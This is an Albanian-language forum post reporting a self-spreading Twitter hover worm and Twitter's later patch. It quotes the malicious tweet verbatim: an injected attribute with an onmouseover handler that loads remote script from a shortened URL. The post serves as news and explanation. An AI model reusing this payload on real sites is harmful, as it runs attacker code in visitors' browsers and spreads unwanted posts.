• Përshëndetje Vizitor!

    Nëse ju shfaqet ky mesazh do të thotë se ju nuk jeni regjistruar akoma. Edhe pse nuk jeni regjistruar ju arrini të shihni pjesën me të madhe të seksioneve dhe diskutimeve të forumit, por akoma nuk gëzoni të drejten për të marrë pjesë në to dhe në avantazhet e të qënurit anëtar i këtij komuniteti. Ju lutem : REGJISTROHUNI që të dërgoni postime dhe mesazhe në Forum-Al.

    Regjistrohu !

Përmirësohet lëshimi në Twitter

SEa

Anëtar i ri
Anëtar
Jan 15, 2010
Postime
1,516
Pikët
0
Vendndodhja
marina di massa
Gjatë mëngjesit të sotëm është gjetur lëshimi në shërbimin për mikro-blogje dhe rrjetin për shoqërim Twitter i cili shpërndahej pandalshëm për orë të tëra, mirëpo tani nga Twitter raportojnë se problemi është zgjidhur.
Siç edhe iu kemi raportuar, Twitter tërë mëngjesin e djeshëm ishte stërngarkuar me porosi të shumta të statusit me përmbajtje të dyshuara të cilat po shpërndaheshin pandalshëm, madje edhe nëse përdoruesi nuk bënte asgjë tjetër pos që kyçej në llogarinë e tij në Twitter.

Shembulli i porosisë kontestuese duket kështu:

http://t.co/@"style="font-size:999999999999px;

"onmouseover="$.getScript('http:u002fu002fis.gdu002ffl9A7')"/

Ashtu siç edhe raportuam dje, mjaftonte që përdoruesit të kalonin me miun e kompjuterit mbi një lidhje të tillë të internetit për të aktivizuar kodin dashakeq. Në disa raste, përdoruesit merrnin vetëm ndonjë porosi të kotë, e në rastet tjera skripti i drejtonte ata tek ndonjë faqe pornografike apo të ngjashme.

Pas disa orësh kaosi të përgjithshëm në Twitter, të ngarkuar me mijëra porosi statusi të cilat përdoruesit nuk i kishin publikuar vet, nga Twitter lajmërojnë se kanë arnuar lëshimin. Kjo është njëra prej pikave më të zeza në historinë e Twitterit, i cili ndryshe njihet për nivel të lartë të sigurisë dhe stabilitetit.
 
Top